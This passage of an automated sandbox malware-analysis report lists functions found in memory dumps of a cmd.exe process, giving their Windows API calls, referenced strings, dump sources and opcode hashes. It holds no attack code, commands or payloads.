                                                                                        • Opcode Fuzzy Hash: a54d11b82f9491412a8726d74d522cee7080b709242b24c571322f1b65061c98
                                                                                        • Instruction Fuzzy Hash: 4DE06D373813043AE6207599AC02FA7B29CCB81B20F150026FA0EEA2C0D995F80146A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DEA630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02DE4536,?,02DE4CAF,02DE4CAF,?,02DE4536,?,?,?,?,?,00000000,00000000,?), ref: 02DEA65D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                        • Instruction ID: 2f96cabc379780f9c9dea0f65dd69bc3103d20034f8df467fb5e129ba9810d10
                                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                        • Instruction Fuzzy Hash: 59E012B2200208ABDB14EF99CC40EA777ADEF88654F118558BA095B281C630F9108AF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DEA7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DDF1D2,02DDF1D2,?,00000000,?,?), ref: 02DEA800
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction ID: eead998666303cfbcef981d77788e5f78666ce57450a83fbcbe091a9f9718b50
                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction Fuzzy Hash: D0E01AB1200208ABDB10EF49CC84EE737ADEF88650F118154BA0957241C930E8108BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DDF6C7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,02DD8D14,?), ref: 02DDF6FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 755afa4ffb5bb0d6c596bdb6fd38475aeb2c1e8456628ed37241fa372a659550
                                                                                        • Instruction ID: 4bda1cc027d3300c11279f2a0a45ed2697ce192314ed7db990db975a044d4ca5
                                                                                        • Opcode Fuzzy Hash: 755afa4ffb5bb0d6c596bdb6fd38475aeb2c1e8456628ed37241fa372a659550
                                                                                        • Instruction Fuzzy Hash: 91E08C356947842AE711FBB48C12F2277C9AF8AA14F4E40A8F98997BC3E994E5018621
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DDF6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,02DD8D14,?), ref: 02DDF6FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                        • Instruction ID: e1e619ffb59b9bb63495d65d2d93e137f7e6636b17c1609a66d6a73b84890050
                                                                                        • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                        • Instruction Fuzzy Hash: 54D05E656503082AEA10BAA49C02F2632899B44A04F490064F949963C3D954E4008565
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 215e3bdaafa66f962d69597d52109d5396dd26e004003a19a5cf994982a6641d
                                                                                        • Instruction ID: 72a896b735fd37e95365e07579ed7e3c9f4c3e9ca490358949ea6a68691c5041
                                                                                        • Opcode Fuzzy Hash: 215e3bdaafa66f962d69597d52109d5396dd26e004003a19a5cf994982a6641d
                                                                                        • Instruction Fuzzy Hash: 4CB09B729014D5C5DA51D760470C7177D04E7D1705F15C5F5F1464641E8738C095F177
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00D84191 Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 00D841B9
                                                                                        • _get_osfhandle.MSVCRT ref: 00D841CA
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00D84205
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D8426C
                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00D89E02,?,00000010), ref: 00D84283
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D84292
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D842B1
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D842C4
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00D842D2
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D842D9
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00D8432F
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D84336
                                                                                        • _wcsnicmp.MSVCRT ref: 00D843DB
                                                                                        • _wcsnicmp.MSVCRT ref: 00D843F0
                                                                                        • _wcsnicmp.MSVCRT ref: 00D84405
                                                                                        • _wcsnicmp.MSVCRT ref: 00D8441A
                                                                                        • _wcsnicmp.MSVCRT ref: 00D8442F
                                                                                        • _wcsnicmp.MSVCRT ref: 00D84444
                                                                                        • _wcsnicmp.MSVCRT ref: 00D84459
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 00D844A5
                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00D844F0
                                                                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00D84506
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 00D8451D
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00D84565
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D8456C
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 00D84595
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D8459C
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D845C3
                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00D89E02,?,00000000), ref: 00D845D4
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D845DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                        • API String ID: 2991647268-3100821235
                                                                                        • Opcode ID: 896ce618e652127b0f2aba6fbb94a84b6a9776eff193a81cab80154524d64470
                                                                                        • Instruction ID: affff6aa650afa85178fc6df3e6bd63a4b1656fd19d651cf28e177b684429f30
                                                                                        • Opcode Fuzzy Hash: 896ce618e652127b0f2aba6fbb94a84b6a9776eff193a81cab80154524d64470
                                                                                        • Instruction Fuzzy Hash: 9AC17E70604302AFD710AF68DC49A2BBBE5FF89714F084A2DF956C62A0D7B5C945CB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D68572 Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 392COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D68791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00D66906,0000001F,?,00000080), ref: 00D68791
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,00D9C9E0,00000008), ref: 00D6859E
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00D685BC
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00D68614
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00D68653
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00D9C9D0,00000008), ref: 00D6867D
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00D9C970,00000020), ref: 00D68698
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00D9C930,00000020), ref: 00D686B0
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,00D9C8F0,00000020), ref: 00D686C8
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,00D9C8B0,00000020), ref: 00D686E0
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,00D9C870,00000020), ref: 00D686F8
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,00D9C830,00000020), ref: 00D68710
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,00D9C7F0,00000020), ref: 00D68728
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,00D9C9C0,00000008), ref: 00D68743
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,00D9C9B0,00000008), ref: 00D6875B
                                                                                        • setlocale.MSVCRT ref: 00D68770
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale$DefaultUsersetlocale
                                                                                        • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                        • API String ID: 1351325837-2236139042
                                                                                        • Opcode ID: 5972d3d047ee81289b98f7569fd504c22eb23ccc0cac9fe4a3451aba15320f4d
                                                                                        • Instruction ID: 22c008ee40d72c16e721393420a4e41b2fe9b54a1b2fa79aba934d7ad4d426b7
                                                                                        • Opcode Fuzzy Hash: 5972d3d047ee81289b98f7569fd504c22eb23ccc0cac9fe4a3451aba15320f4d
                                                                                        • Instruction Fuzzy Hash: 75C1C471710312A7DB304F39CD08B7B27A9AF51768F68922BE94ADA285FB74C941C770
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D69458 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 328threadprocessstringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,00D8C9D0,00000108,00D72107,?,00000000,00000000,00000000), ref: 00D694AA
                                                                                        • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 00D694D9
                                                                                        • memset.MSVCRT ref: 00D694F1
                                                                                        • memset.MSVCRT ref: 00D6954A
                                                                                        • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 00D6955D
                                                                                          • Part of subcall function 00D71D90: _wcsnicmp.MSVCRT ref: 00D71E14
                                                                                        • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 00D695B8
                                                                                        • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00D69602
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00D69624
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00D7BDF1
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00D7BE0D
                                                                                        • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 00D7BE26
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                        • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                        • API String ID: 1449572041-3461277227
                                                                                        • Opcode ID: 7e1ba04c699f0e52202a5d8910ecb94f31d7aa414286e212d055cf7f025fd493
                                                                                        • Instruction ID: 82748dc59cb3a2ce3dd66704ad059fa7dadcd676a14c880d5fd66ca9550a35f6
                                                                                        • Opcode Fuzzy Hash: 7e1ba04c699f0e52202a5d8910ecb94f31d7aa414286e212d055cf7f025fd493
                                                                                        • Instruction Fuzzy Hash: 77C17D71A003149FDB249FA4CC55BAAB7B8EF45714F1480AAF64AD7290EB708D84CF72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D64C10 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 552COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: [...]$ [..]$ [.]$...$:
                                                                                        • API String ID: 0-1980097535
                                                                                        • Opcode ID: aa004f95f981fcc9ed7dfe07ddd7c2d29396efc68b3c753ca2f54c39a13b4879
                                                                                        • Instruction ID: a284845d0c6eb5b33e753e894a176b6a36eec5a5cf4b50f318301824edb0474e
                                                                                        • Opcode Fuzzy Hash: aa004f95f981fcc9ed7dfe07ddd7c2d29396efc68b3c753ca2f54c39a13b4879
                                                                                        • Instruction Fuzzy Hash: EC127CB02083419BD724DF24C889A6FB7E9EF88344F44892DF58AC7291EB74D945DB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D66854 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 366timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00D8E590,?,00002000), ref: 00D66896
                                                                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D668AA
                                                                                        • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00D668BE
                                                                                        • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D668D2
                                                                                        • realloc.MSVCRT ref: 00D7A5E7
                                                                                          • Part of subcall function 00D68791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00D66906,0000001F,?,00000080), ref: 00D68791
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00D66907
                                                                                        • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 00D6698F
                                                                                        • memmove.MSVCRT ref: 00D66A86
                                                                                        • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00D66AAF
                                                                                        • realloc.MSVCRT ref: 00D66ACA
                                                                                        • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00D66AFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                                        • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                                        • API String ID: 2927284792-4023967598
                                                                                        • Opcode ID: b8204b647e76a2133eed7d0544b804948cabff085d208bf862eb38d8e1911bb6
                                                                                        • Instruction ID: be0bace6bdcded015186d00a73db9b84752f31d3007bad5f26d1b1f24b1f3876
                                                                                        • Opcode Fuzzy Hash: b8204b647e76a2133eed7d0544b804948cabff085d208bf862eb38d8e1911bb6
                                                                                        • Instruction Fuzzy Hash: C3C1C6729002259BDB24DFA4DC45AEE77B9EB88300F1481AAE90DE7250EB31DD85CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D74EC1 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 395fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D74F03
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 00D74F67
                                                                                        • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 00D74F77
                                                                                        • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00D62670,?,?,?,-00000001), ref: 00D74FEB
                                                                                        • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 00D75103
                                                                                        • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00D7511E
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D75141
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstmemset$Next
                                                                                        • String ID: \\?\
                                                                                        • API String ID: 3059144641-4282027825
                                                                                        • Opcode ID: d27bf1bde429a9c123cdc65570c260651613339e3cedea828833a6e065a9c53b
                                                                                        • Instruction ID: 5043786feaa7cb36d826b541486e2f610c0d90abf5d2a5dcf60758237058dffc
                                                                                        • Opcode Fuzzy Hash: d27bf1bde429a9c123cdc65570c260651613339e3cedea828833a6e065a9c53b
                                                                                        • Instruction Fuzzy Hash: 89E10371A002098BDB24EB68DC85BBA77B8EF54300F4844A9E90DD7285F771DE85CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6532E Relevance: 19.8, APIs: 13, Instructions: 272COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000002), ref: 00D6539C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: c824324113123766fc2c95c600ee2bdb7392c904aad9bcd8b02b14ee446d6792
                                                                                        • Instruction ID: 8efe58255551b4248db52b8c8581c88f14081f3a3359c0531c5111a0e40e97e2
                                                                                        • Opcode Fuzzy Hash: c824324113123766fc2c95c600ee2bdb7392c904aad9bcd8b02b14ee446d6792
                                                                                        • Instruction Fuzzy Hash: 4AA103729002168BCB249F78C8956BEF3B5EF54310F5885ADE94AD7284FB319E81CB34
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8769E Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(335C4BB4,00000000,?), ref: 00D87710
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D87722
                                                                                          • Part of subcall function 00D6EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00D8E590,00002000,?,00DA8BF0,00000000,?,?,00D68F0D), ref: 00D6EC51
                                                                                        • towupper.MSVCRT ref: 00D878BC
                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00D879F1
                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00D61F8C,00D63B98), ref: 00D87B15
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,335C4BB4,00000000,?), ref: 00D87D0D
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D87D20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                                                        • String ID: %s $%s>$PROMPT$Unknown
                                                                                        • API String ID: 708651206-3050974680
                                                                                        • Opcode ID: 324940bd99057a43cbb032e89cbb3b32e459669f6fe06f1ce7a9f751c0c3070e
                                                                                        • Instruction ID: e507e7f93f0af62419d8efb85b2b36d1fbcda7bf5911f7423c3a0996fe85584d
